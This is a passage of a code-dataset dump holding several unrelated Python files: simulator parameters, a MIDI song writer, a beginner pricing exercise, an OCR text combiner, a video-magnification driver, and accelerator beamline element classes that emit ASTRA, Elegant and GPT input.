700.0\nSTD_DISTANCE_CLIENT_COUNTRY = 300.0\nMEAN_DISTANCE_DISTRICT_COUNTRY = 690.0\nSTD_DISTANCE_DISTRICT_COUNTRY = 300.0\nNUMBER_OF_CORES_COUNTRY = 4\nBANDWIDTH_CAPABILITY_COUNTRY = 15 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_COUNTRY = 4.0\nSTD_PROCESSING_START_DELAY_COUNTRY = 1.0\n\n# Continents.\nNUMBER_OF_CONTINENTS = 7\nMEAN_DISTANCE_CLIENT_CONTINENT = 1500.0\nSTD_DISTANCE_CLIENT_CONTINENT = 500.0\nMEAN_DISTANCE_DISTRICT_CONTINENT = 1490.0\nSTD_DISTANCE_DISTRICT_CONTINENT = 500.0\nNUMBER_OF_CORES_CONTINENT = 1000\nBANDWIDTH_CAPABILITY_CONTINENT = 20 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CONTINENT = 4.0\nSTD_PROCESSING_START_DELAY_CONTINENT = 1.0\n\n# Central.\nMEAN_DISTANCE_CLIENT_CENTRAL = 5000.0\nSTD_DISTANCE_CLIENT_CENTRAL = 2000.0\nMEAN_DISTANCE_DISTRICT_CENTRAL = 4990.0\nSTD_DISTANCE_DISTRICT_CENTRAL = 2000.0\nNUMBER_OF_CORES_CENTRAL = 1000\nBANDWIDTH_CAPABILITY_CENTRAL = 20 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CENTRAL = 4.0\nSTD_PROCESSING_START_DELAY_CENTRAL = 1.0\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/default_architecture_parameters.py","file_name":"default_architecture_parameters.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"4537097956","text":"\"\"\"\r\nSongwriter包通过字典格式的乐谱来生成midi文件\r\n\"\"\"\r\n\r\nfrom mido import MidiTrack, Message, MidiFile\r\nimport numpy as np\r\n\r\n\r\nclass TrackWriter:\r\n \"\"\"\r\n 输入音乐的调式、速度、乐谱等信息,写入一段音轨\r\n \"\"\"\r\n def __init__(self, track, score, channel, major=\"c\", tempo=80):\r\n self.track = track\r\n self.score = score\r\n self.major = major\r\n self.tempo = tempo\r\n self.channel = channel\r\n self.notes = score[\"notes\"]\r\n self.durs = np.asarray([x[1] for x in self.notes])\r\n self.beats = np.cumsum(self.durs)\r\n\r\n def add_note(\r\n self, note, duration, start=0, volume=75,\r\n octave=0, tempo=80, chan=0, major=\"c\", change=0,\r\n start_type=\"beat\", switch=\"openclose\",\r\n ctrls=[], cvalues=[]\r\n ):\r\n if note == \"r0\": #休止符\r\n real_vol = 0\r\n real_note = 60\r\n else:\r\n nlp = [\r\n \"c\", \"c+\", \"d\", \"d+\", \"e\", \"f\",\r\n \"f+\", \"g\", \"g+\", \"a\", \"a+\", \"b\"\r\n ]\r\n nlm = [\r\n \"c\", \"d-\", \"d\", \"e-\", \"e\", \"f\",\r\n \"g-\", \"g\", \"a-\", \"a\", \"b-\", \"b\"\r\n ]\r\n\r\n n = note[0:-1]\r\n try:\r\n f1 = nlp.index(n)\r\n except ValueError:\r\n f1 = nlm.index(n)\r\n except ValueError:\r\n raise ValueError(\"Please input correct note!\")\r\n try:\r\n f2 = nlp.index(major)\r\n except ValueError:\r\n f2 = nlm.index(major)\r\n except ValueError:\r\n raise ValueError(\"Please input correct note!\")\r\n\r\n height = eval(note[-1])\r\n if f2 > 6:\r\n f2 -= 12\r\n\r\n real_vol = int(1.27 * volume)\r\n real_note = f1 + f2 + 12 * (height + 1 + octave) + change\r\n\r\n real_dur = int(28800 / tempo * duration)\r\n real_st = 0\r\n\r\n if start_type == \"beat\":\r\n real_st = int(28800 / tempo * start)\r\n elif start_type == \"time\":\r\n real_st = int(480 * start)\r\n else:\r\n raise ValueError(\"Please input correct start_type:\\\r\n 'beat' or 'time'.\")\r\n\r\n if ctrls is not []:\r\n for i in range(len(ctrls)):\r\n mc = Message(\"control_change\", channel=chan, control=ctrls[i], value=cvalues[i], time=0)\r\n self.track.append(mc)\r\n\r\n if switch == \"openclose\":\r\n mstart = Message(\r\n \"note_on\", note=real_note, velocity=real_vol,\r\n time=real_st, channel=chan\r\n )\r\n mend = Message(\r\n \"note_off\", note=real_note, velocity=real_vol,\r\n time=real_dur, channel=chan\r\n )\r\n self.track.append(mstart)\r\n self.track.append(mend)\r\n elif switch == \"open\":\r\n mstart = Message(\r\n \"note_on\", note=real_note, velocity=real_vol,\r\n time=real_st, channel=chan\r\n )\r\n self.track.append(mstart)\r\n elif switch == \"close\":\r\n mend = Message(\r\n \"note_off\", note=real_note, velocity=real_vol,\r\n time=real_dur, channel=chan\r\n )\r\n self.track.append(mend)\r\n else:\r\n raise ValueError(\"Please input corrrect switch:\\\r\n 'open', 'close' or 'openclose'.\")\r\n\r\n def get_volumes(self):\r\n vctrl = self.score[\"options\"][\"volume\"]\r\n if len(self.beats) - 1 != vctrl[-1][1]:\r\n raise ValueError(\"The number of notes are\", len(self.beats), \"\\n\\\r\n but the last note in volume control is\", vctrl[-1][1])\r\n vlist = [0] * len(self.beats)\r\n for i in range(len(vctrl)):\r\n vlist[vctrl[i][1]] = vctrl[i][0]\r\n for j in range(len(vctrl) - 1):\r\n for k in range(vctrl[j][1] + 1, vctrl[j + 1][1]):\r\n vol = vctrl[j][0] + (vctrl[j + 1][0] - vctrl[j][0])\\\r\n / (self.beats[vctrl[j + 1][1]] - self.beats[vctrl[j][1]])\\\r\n * (self.beats[k] - self.beats[vctrl[j][1]])\r\n vlist[k] = vol\r\n return vlist\r\n\r\n def write_a_track(self):\r\n try:\r\n namelist = self.score[\"options\"].keys()\r\n if namelist == []:\r\n raise KeyError(\"no keys in namelist\")\r\n except KeyError:\r\n for i in range(len(self.notes)):\r\n self.add_note(\r\n self.notes[i][0], self.notes[i][1],\r\n tempo=self.tempo, chan=self.channel, major=self.major,\r\n )\r\n else:\r\n oclist = [0] * len(self.notes)\r\n cglist = [0] * len(self.notes)\r\n ctrnamedict = {\r\n \"pedal\": 64,\r\n \"tweak\": 1\r\n }\r\n ctrllist = []\r\n for i in range(len(self.notes)):\r\n ctrllist.append([])\r\n cvaluelist = []\r\n for i in range(len(self.notes)):\r\n cvaluelist.append([])\r\n vlist = [75] * len(self.notes)\r\n for name in namelist:\r\n if name == \"octave\":\r\n for se in self.score[\"options\"][\"octave\"]:\r\n oc, start, end = se\r\n oclist[start:end + 1] = [oc] * (end + 1 - start)\r\n elif name == \"tonechange\":\r\n for se in self.score[\"options\"][\"tonechange\"]:\r\n cg, start, end = se\r\n cglist[start:end + 1] = [cg] * (end + 1 - start)\r\n elif name == \"volume\":\r\n vlist = self.get_volumes()\r\n else:\r\n ctrlnum = ctrnamedict[name]\r\n for msgs in self.score[\"options\"][name]:\r\n ctrllist[msgs[1]].append(ctrlnum)\r\n cvaluelist[msgs[1]].append(msgs[0])\r\n\r\n for i in range(len(self.notes)):\r\n self.add_note(\r\n self.notes[i][0], self.notes[i][1],\r\n volume=vlist[i], octave=oclist[i], change=cglist[i],\r\n chan=self.channel, major=self.major, tempo=self.tempo,\r\n ctrls=ctrllist[i], cvalues=cvaluelist[i]\r\n )\r\n\r\n\r\nclass SongWriter:\r\n \"\"\"\r\n 整合乐谱中不同音轨的信息,将音乐写入midi文件\r\n \"\"\"\r\n def __init__(self, numtr, json, out):\r\n self.file = MidiFile()\r\n self.tracks = self.file.tracks\r\n self.numtr = numtr\r\n for x in range(self.numtr):\r\n self.tracks.append(MidiTrack())\r\n self.out = out\r\n self.json = json\r\n \r\n def makesong(self):\r\n part = self.json\r\n major = part[\"major\"]\r\n tempo = part[\"tempo\"]\r\n channellist = part[\"channellist\"]\r\n tonelist = part[\"tonelist\"]\r\n melody = part[\"melody\"]\r\n for x in range(self.numtr):\r\n tw = TrackWriter(\r\n self.tracks[x], melody[x],\r\n channellist[x], major, tempo\r\n )\r\n self.tracks[x].append(Message(\r\n \"program_change\", channel=channellist[x],\r\n program=tonelist[x]\r\n ))\r\n tw.write_a_track()\r\n\r\n self.file.save(self.out)","repo_name":"LiShuoxue/Kunqu_Final","sub_path":"Songwriter.py","file_name":"Songwriter.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232552224","text":"# 1. Плод - текст с възможности: \"Watermelon\", \"Mango\", \"Pineapple\" или \"Raspberry\"\n# 2. Размерът на сета - текст с възможности: \"small\" или \"big\"\n# 3. Брой на поръчаните сетове - цяло число в интервала [1 … 10000]\n\nfruit = input()\nsize = input()\ncount = int(input())\nprice = 0\n\nif size ==\"small\":\n if fruit == \"Watermelon\":\n price = 2 * 56\n elif fruit == \"Mango\":\n price =2 * 36.66\n elif fruit == \"Pineapple\":\n price =2 * 42.10\n elif fruit == \"Raspberry\":\n price =2 * 20\n\nif size ==\"big\":\n if fruit == \"Watermelon\":\n price = 5 * 28.70\n elif fruit == \"Mango\":\n price =5 * 19.60\n elif fruit == \"Pineapple\":\n price =5 * 24.80\n elif fruit == \"Raspberry\":\n price =5 * 15.20\n\ntotal = price * count\nif total >= 400 and total <= 1000:\n total *= 0.85\nelif total > 1000:\n total /= 2\nprint(F\"{total:.2F} lv.\")","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online Exam_28_and_29_March_2020/03_Energy_Booster.py","file_name":"03_Energy_Booster.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30690004152","text":"import os, utils, glob\n\n\ndef combine_text(input_dir, output_dir, image_order):\n '''\n Combines the text of multiple scans into one file in the image order specified by the user, and writes output to text file\n '''\n print(\"input_dir\", input_dir)\n print(\"output_dir\", output_dir)\n for root, subdirs, files in os.walk(input_dir):\n output_file = output_dir + root[len(input_dir):] + \".txt\"\n print(\"root\", root)\n print(\"output_file\", output_file)\n print(\"root[len..]\", root[len(input_dir):])\n structure = os.path.dirname(output_file)\n utils.construct_output_dir(structure)\n if os.path.exists(output_file):\n continue\n pages = []\n for file in files:\n if file.split(\".\")[1] == \"txt\":\n pages.append(file)\n if pages:\n if image_order == \"underscore_numerical\": #eg book_1.jpg book_2.jpg book_3.jpg\n pages.sort(key = lambda pages: int(pages.split(\".\")[0].split(\"_\")[-1]))\n elif image_order == \"dash_numerical\": # eg book-1.jpg, book-2.jpg, book-3.jpg\n pages.sort(key = lambda pages: int(pages.split(\".\")[0].split(\"-\")[-1]))\n elif image_order == \"numerical\": #eg. 1.jpg, 2.jpg, 3.jpg\n pages.sort(key = lambda pages: int(pages.split(\".\")[0]))\n else: # alphabetical, eg a.jpg, b.jpg, c.jpg, d.jpg\n pages.sort()\n\n with open(output_file, 'w') as output:\n for file in pages: # add a sort by for file naming\n abspath = os.path.join(root, file)\n with open(abspath) as f:\n for line in f:\n output.write(line)\n print(str(len(pages)) + \" images combined and written to \" + output_file)\n return\n\n","repo_name":"miielab/miienlp","sub_path":"miienlp/ocr/src/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16991163005","text":"import json \r\nfrom eulerian_magnification import *\r\nfrom phase_based_magnification import *\r\n\r\nfileTrials = [\"parameters_mid_alpha.json\", \"parameters_high_alpha.json\", \"parameters_low_alpha.json\"]\r\n\r\n# fileTrials = [\"testSample_1-3.json\",\"testSample_2-4.json\",\"testSample_4-6.json\",\"testSample_6-8.json\"]\r\n\r\nfor jsonFile in fileTrials:\r\n try:\r\n parametersFn = open(jsonFile, \"r\")\r\n except FileExistsError:\r\n print(\"Please make sure parameters.json file exist in current directory\")\r\n\r\n parameters = json.load(parametersFn)\r\n\r\n for magnifyMode, files in parameters.items():\r\n if magnifyMode == \"eulerian\":\r\n print(\"working on Eulerian based magnification\")\r\n for fileName, params in files.items():\r\n if params[\"filter\"] == \"butter\":\r\n try:\r\n videoMagnificationButterWorthFilter(fileName,params[\"alpha\"],params[\"lambda_c\"],params[\"samplingRate\"],params[\"chromeAttenuation\"],params[\"lowFreq\"],params[\"highFreq\"])\r\n except Exception as e:\r\n print(\"Failed in processing\", fileName, \"due to\", e)\r\n\r\n elif params[\"filter\"] == \"ideal\":\r\n try:\r\n videoMagnificationIdealFilter(fileName,params[\"alpha\"],params[\"lambda_c\"],params[\"samplingRate\"],params[\"chromeAttenuation\"],params[\"lowFreq\"],params[\"highFreq\"])\r\n except Exception as e:\r\n print(\"Failed in processing\", fileName, \"due to\", e)\r\n elif magnifyMode == \"riesz\":\r\n print(\"working on Riesz based magnification\")\r\n for fileName, params in files.items():\r\n try:\r\n phaseBasedMagnification(fileName, params[\"alpha\"],params[\"samplingRate\"], params[\"lowFreq\"], params[\"highFreq\"])\r\n except Exception as e:\r\n print(\"Failed in processing\", fileName, \"due to\", e)","repo_name":"mmareimorsy/EulerianVideoMagnification","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17047047759","text":"from operator import add\nfrom SimulationFramework.Framework_objects import *\nfrom SimulationFramework.FrameworkHelperFunctions import *\nfrom SimulationFramework.FrameworkHelperFunctions import _rotation_matrix\n\nclass dipole(frameworkElement):\n\n def __init__(self, name=None, type='dipole', **kwargs):\n super(dipole, self).__init__(name, type, **kwargs)\n self.add_default('csr_bins', 100)\n self.add_default('deltaL', 0)\n self.add_default('csr_enable', 1)\n self.add_default('isr_enable', True)\n self.add_default('n_kicks', 10)\n self.add_default('sr_enable', True)\n self.add_default('integration_order', 4)\n self.add_default('nonlinear', 1)\n self.add_default('smoothing_half_width', 1)\n self.add_default('edge_order', 2)\n self.add_default('edge1_effects', 1)\n self.add_default('edge2_effects', 1)\n\n # @property\n # def middle(self):\n # start = self.position_start\n # length_vector = self.rotated_position([0,0, self.length / 2.0], offset=[0,0,0], theta=self.theta)\n # starting_middle = length_vector\n # # print(self.objectname, self.theta, self.starting_rotation, self.rotated_position(starting_middle, offset=self.starting_offset, theta=self.starting_rotation)[0])\n # return np.array(start) + self.rotated_position(starting_middle, offset=self.starting_offset, theta=self.starting_rotation)\n\n @property\n def middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n if abs(angle) > 0:\n cx = 0\n cy = 0\n cz = (l * np.tan(angle/2.0)) / angle\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def arc_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = r * (np.cos(angle/2.0) - 1)\n cy = 0\n cz = r * np.sin(angle/2.0)\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def line_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = 0.5 * r * (np.cos(angle) - 1)\n cy = 0\n cz = 0.5 * r * np.sin(angle)\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def TD_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = 0.25 * r * (2.0 * np.cos(angle/2.0) + np.cos(angle) - 3)\n cy = 0\n cz = 0.25 * r * (2 * np.sin(angle/2.0) + np.sin(angle))\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def end(self):\n start = self.position_start\n if abs(self.angle) > 1e-9:\n ex = -1. * (self.length * (np.cos(self.angle) - 1)) / self.angle\n ey = 0\n ez = (self.length * (np.sin(self.angle))) / self.angle\n return np.array(self.position_start) + self.rotated_position(np.array([ex, ey, ez]), offset=self.starting_offset, theta=-1*self.y_rot)\n else:\n return np.array(self.position_start) + self.rotated_position(np.array([0,0,self.length]), offset=self.starting_offset, theta=-1*self.y_rot)\n\n @property\n def width(self):\n if 'width' in self.objectproperties:\n return self.objectproperties['width']\n else:\n return 0.2\n @width.setter\n def width(self, w):\n self.objectproperties['width'] = w\n\n def __neg__(self):\n newself = copy.deepcopy(self)\n if 'exit_edge_angle' in newself.objectproperties and 'entrance_edge_angle' in newself.objectproperties:\n e1 = newself['entrance_edge_angle']\n e2 = newself['exit_edge_angle']\n newself.objectproperties['entrance_edge_angle'] = e2\n newself.objectproperties['exit_edge_angle'] = e1\n elif 'entrance_edge_angle' in newself.objectproperties:\n newself.objectproperties['exit_edge_angle'] = newself.objectproperties['entrance_edge_angle']\n del newself.objectproperties['entrance_edge_angle']\n elif 'exit_edge_angle' in newself.objectproperties:\n newself.objectproperties['entrance_edge_angle'] = newself.objectproperties['exit_edge_angle']\n del newself.objectproperties['exit_edge_angle']\n newself.objectname = '-'+newself.objectname\n return newself\n\n def check_value(self, estr, default=0):\n if estr in self.objectproperties:\n if isinstance(self.objectproperties[estr], str):\n return checkValue(self, self.objectproperties[estr],default)\n else:\n return self.objectproperties[estr]\n else:\n return default\n\n @property\n def intersect(self):\n return self.rho * np.tan(self.angle / 2.0)\n @property\n def rho(self):\n return -1*self.length/self.angle if self.length is not None and abs(self.angle) > 1e-9 else 0\n\n @property\n def e1(self):\n return self.check_value('entrance_edge_angle')\n @property\n def e2(self):\n return self.check_value('exit_edge_angle')\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n k1 = self.k1 if self.k1 is not None else 0\n for key, value in list(merge_two_dicts({'k1': k1}, merge_two_dicts(self.objectproperties, self.objectdefaults)).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n # if 'bins' in key or 'bins' in self._convertKeword_Elegant(key):\n # print('BINS KEY ', key, ' ', self._convertKeword_Elegant(key))\n if 'edge_angle' in key:\n key = self._convertKeword_Elegant(key)\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n else:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\n @property\n def corners(self):\n corners = [0,0,0,0]\n if hasattr(self, 'global_rotation') and self.global_rotation is not None:\n rotation = self.global_rotation[2] if len(self.global_rotation) is 3 else self.global_rotation\n else:\n rotation = 0\n theta = self.e1+rotation\n corners[0] = np.array(list(map(add, np.transpose(self.position_start), np.dot([-self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners[3] = np.array(list(map(add, np.transpose(self.position_start), np.dot([self.width*self.length,0,0], _rotation_matrix(theta)))))\n theta = self.angle-self.e2+rotation\n corners[1] = np.array(list(map(add, np.transpose(self.end), np.dot([-self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners[2] = np.array(list(map(add, np.transpose(self.end), np.dot([self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners = [self.rotated_position(x, offset=self.starting_offset, theta=self.starting_rotation) for x in corners]\n return corners\n\n def write_CSRTrack(self, n):\n z1 = self.position_start[2]\n z2 = self.position_end[2]\n return \"\"\"dipole{\\nposition{rho=\"\"\"+str(z1)+\"\"\", psi=\"\"\"+str(chop(self.theta+self.e1))+\"\"\", marker=d\"\"\"+str(n)+\"\"\"a}\\nproperties{r=\"\"\"+str(self.rho)+\"\"\"}\\nposition{rho=\"\"\"+str(z2)+\"\"\", psi=\"\"\"+str(chop(self.theta+self.angle-self.e2))+\"\"\", marker=d\"\"\"+str(n)+\"\"\"b}\\n}\\n\"\"\"\n\n def write_ASTRA(self, n):\n if abs(checkValue(self, 'strength', default=0)) > 0 or abs(self.rho) > 0:\n corners = self.corners\n if self.plane is None:\n self.plane = 'horizontal'\n params = OrderedDict([\n ['D_Type', {'value': '\\''+self.plane+'\\'', 'default': '\\'horizontal\\''}],\n ['D_Gap', {'type': 'list', 'value': [self.gap, self.gap], 'default': [0.0001, 0.0001]}],\n ['D1', {'type': 'array', 'value': [corners[3][0],corners[3][2]] }],\n ['D3', {'type': 'array', 'value': [corners[2][0],corners[2][2]] }],\n ['D4', {'type': 'array', 'value': [corners[1][0],corners[1][2]] }],\n ['D2', {'type': 'array', 'value': [corners[0][0],corners[0][2]] }],\n # ['D_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n # ['D_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n # ['D_zoff', {'value': self.dz, 'default': 0}],\n # ['D_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n # ['D_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ['D_zrot', {'value': self.z_rot + self.dz_rot, 'default': 0}],\n ])\n if abs(checkValue(self, 'strength', default=0)) > 0 or not abs(self.rho) > 0:\n params['D_strength'] = {'value': checkValue(self, 'strength', 0), 'default': 1e6}\n else:\n params['D_radius'] = {'value': self.rho, 'default': 1e6}\n return self._write_ASTRA(params, n)\n else:\n return None\n\n def gpt_coordinates(self, position, rotation):\n x,y,z = chop(position, 1e-6)\n psi, phi, theta = rotation\n output =''\n for c in [0, 0, z]:\n output += str(c)+', '\n output += 'cos('+str(self.angle)+'), 0, -sin('+str(self.angle)+'), 0, 1 ,0'\n return output\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n # field = Brho/self.rho if abs(self.rho) > 0 else 0\n field = self.angle * Brho / self.length\n if abs(field) > 0 and abs(self.rho) < 100:\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = relpos + [0, 0, self.intersect]\n coord = self.gpt_coordinates(relpos, relrot)\n new_ccs = self.gpt_ccs(ccs).name\n b1 = 1.0 / (2 * self.check_value(self.half_gap, default=0.02) * self.check_value(self.edge_field_integral, default=0.4))\n dl = 0 if self.deltaL is None else self.deltaL\n # print(self.objectname, ' - deltaL = ', dl)\n # b1 = 0.\n '''\n ccs( \"wcs\", 0, 0, startofdipole + intersect1, Cos(theta), 0, -Sin(theta), 0, 1, 0, \"bend1\" ) ;\n sectormagnet( \"wcs\", \"bend1\", rho, field, e1, e2, 0., 100., 0 ) ;\n '''\n output = 'ccs( ' + ccs.name + ', '+ coord + ', ' + new_ccs + ');\\n'\n output += 'sectormagnet( ' + ccs.name + ', '+ new_ccs +', '+str(abs(self.rho))+', '+str(abs(field))+', ' + str(abs(self.e1)) + ', ' + str(abs(self.e2)) + ', ' + str(abs(dl)) + ', ' + str(b1) + ', 0);\\n'\n else:\n output = ''\n return output\n\n def gpt_ccs(self, ccs):\n if abs(self.angle) > 0 and abs(self.rho) < 100:\n # print('Creating new CCS')\n number = str(int(ccs._name.split('_')[1])+1) if ccs._name is not \"wcs\" else \"1\"\n name = 'ccs_' + number if ccs._name is not \"wcs\" else \"ccs_1\"\n # print('middle position = ', self.end)\n return gpt_ccs(name, self.end, self.global_rotation + np.array([0, 0, self.angle]), self.intersect)\n else:\n return ccs\n\nclass kicker(dipole):\n\n def __init__(self, name=None, type='kicker', **kwargs):\n super(kicker, self).__init__(name, type, **kwargs)\n\n @property\n def angle(self):\n hkick = self.horizontal_kick if self.horizontal_kick is not None else 0\n vkick = self.vertical_kick if self.vertical_kick is not None else 0\n return np.sqrt(hkick**2 + vkick**2)\n\n @property\n def z_rot(self):\n hkick = self.horizontal_kick if self.horizontal_kick is not None else 0\n vkick = self.vertical_kick if self.vertical_kick is not None else 0\n return self.global_rotation[0] + np.arctan2(vkick, hkick)\n\n def write_ASTRA(self, n):\n output = ''\n output = super(kicker, self).write_ASTRA(n)\n return output\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n return ''\n\n def gpt_ccs(self, ccs):\n return ccs\n\nclass quadrupole(frameworkElement):\n\n def __init__(self, name=None, type='quadrupole', **kwargs):\n super(quadrupole, self).__init__(name, type, **kwargs)\n self.add_default('k1l', 0)\n self.add_default('n_kicks', 20)\n self.strength_errors = [0]\n\n\n @property\n def k1(self):\n return self.k1l / self.length\n @k1.setter\n def k1(self, k1):\n self.k1l = self.length * k1\n\n @property\n def dk1(self):\n return self.strength_errors[0]\n @dk1.setter\n def dk1(self, dk1):\n self.strength_errors[0] = dk1\n\n def write_ASTRA(self, n):\n if abs(self.k1 + self.dk1) > 0:\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ['Q_xoff', {'value': self.middle[0], 'default': 0}],\n ['Q_yoff', {'value': self.middle[1] + self.dy, 'default': 0}],\n ['Q_xrot', {'value': -1*self.y_rot + self.dy_rot, 'default': 0}],\n ['Q_yrot', {'value': -1*self.x_rot + self.dx_rot, 'default': 0}],\n ['Q_zrot', {'value': -1*self.z_rot + self.dz_rot, 'default': 0}],\n ['Q_k', {'value': self.k1 + self.dk1, 'default': 0}],\n ['Q_length', {'value': self.length, 'default': 0}],\n ['Q_smooth', {'value': self.smooth, 'default': 10}],\n ['Q_bore', {'value': self.bore, 'default': 0.016}],\n ['Q_noscale', {'value': self.scale_field}],\n ['Q_mult_a', {'type': 'list', 'value': self.multipoles}],\n ]), n)\n else:\n return None\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n # print(self.objectname)\n # print('self.start = ', self.position_start)\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = relpos + [0, 0, self.length/2.]\n coord = self.gpt_coordinates(relpos, relrot)\n output = str(self.objecttype) + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) +', '+str(self.length)+', '+str(-Brho*self.k1)+');\\n'\n # coord = self.gpt_coordinates(self.middle, self.global_rotation)\n # output = str(self.objecttype) + '( \"wcs\", ' + coord + ', '+str(self.length)+', '+str(-Brho*self.k1)+');\\n'\n return output\n\nclass cavity(frameworkElement):\n\n def __init__(self, name=None, type='cavity', **kwargs):\n super(cavity, self).__init__(name, type, **kwargs)\n self.add_default('tcolumn', '\"t\"')\n self.add_default('wzcolumn', '\"W\"')\n self.add_default('wxcolumn', '\"W\"')\n self.add_default('wycolumn', '\"W\"')\n self.add_default('wcolumn', '\"Ez\"')\n self.add_default('change_p0', 1)\n self.add_default('n_kicks', self.n_cells)\n # self.add_default('method', '\"non-adaptive runge-kutta\"')\n self.add_default('end1_focus', 1)\n self.add_default('end2_focus', 1)\n self.add_default('body_focus_model', \"SRS\")\n self.add_default('lsc_bins', 100)\n self.add_default('current_bins', 0)\n self.add_default('interpolate_current_bins', 1)\n self.add_default('smooth_current_bins', 1)\n\n def update_field_definition(self):\n if hasattr(self, 'field_definition') and self.field_definition is not None:\n self.field_definition = '\"' + expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'field_definition_sdds') and self.field_definition_sdds is not None:\n self.field_definition_sdds = '\"' + expand_substitution(self, '\\''+self.field_definition_sdds+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'field_definition_gdf') and self.field_definition_gdf is not None:\n self.field_definition_gdf = '\"' + expand_substitution(self, '\\''+self.field_definition_gdf+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'longitudinal_wakefield_sdds') and self.longitudinal_wakefield_sdds is not None:\n self.longitudinal_wakefield_sdds = '\"' + expand_substitution(self, '\\''+self.longitudinal_wakefield_sdds+'\\'').strip('\\'\"')+'\"'\n if hasattr(self, 'transverse_wakefield_sdds') and self.transverse_wakefield_sdds is not None:\n self.transverse_wakefield_sdds = '\"' + expand_substitution(self, '\\''+self.transverse_wakefield_sdds+'\\'').strip('\\'\"')+'\"'\n\n @property\n def cells(self):\n if (self.n_cells is 0 or self.n_cells is None) and self.cell_length > 0:\n cells = round((self.length-self.cell_length)/self.cell_length)\n cells = int(cells - (cells % 3))\n elif self.n_cells > 0 and (self.cell_length is not None and self.cell_length) > 0:\n if self.cell_length == self.length:\n cells = 1\n else:\n cells = int(self.n_cells - (self.n_cells % 3))\n else:\n cells = None\n return cells\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['C_pos', {'value': self.start[2] + self.dz, 'default': 0}],\n ['FILE_EFieLD', {'value': ('\\''+expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\\'').replace('\\\\','/'), 'default': 0}],\n ['C_numb', {'value': self.cells}],\n ['Nue', {'value': self.frequency / 1e9, 'default': 2998.5}],\n ['MaxE', {'value': self.field_amplitude / 1e6, 'default': 0}],\n ['Phi', {'value': -self.phase, 'default': 0.0}],\n ['C_smooth', {'value': self.smooth, 'default': 10}],\n ['C_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n ['C_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n ['C_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['C_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ['C_zrot', {'value': self.z_rot + self.dz_rot, 'default': 0}],\n ]), n)\n\n def 